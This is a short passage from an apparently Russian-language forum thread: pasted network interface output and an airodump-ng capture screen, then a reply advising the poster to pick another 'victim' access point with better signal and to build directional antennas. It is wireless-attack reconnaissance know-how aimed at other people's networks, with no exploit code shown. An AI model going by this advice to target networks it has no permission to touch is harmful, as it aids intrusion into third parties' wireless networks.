fe80::344b:50ff:feb7:ef2d/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:19581 errors:0 dropped:0 overruns:0 frame:0 TX packets:19497 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:17222457 (16.4 MiB) TX bytes:2192415 (2.0 MiB) Потому что в начале мониторинга этого не наблюдается: Code: CH 10 ][ Elapsed: 16 s ][ 2015-05-12 22:14 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 02:2F:0F:AE:44:A9 -1 0 130 0 0 10 11 OPN HP02ACAB BSSID STATION PWR Rate Lost Frames Probe 02:2F:0F:AE:44:A9 2C:76:8A:02:AC:AB -67 0 - 1 19 130
Судя по показаниям аирдампа точка доступа далеко и ты видишь только клинета, попробуй на другой жертве. желательно чтобы показатель RXQ был близок к 100. Почитай об использовании направленных антенн есть такой форум по антеннам lan23.ru там множество конструкций антенн для нашего дела из подручных материалов.
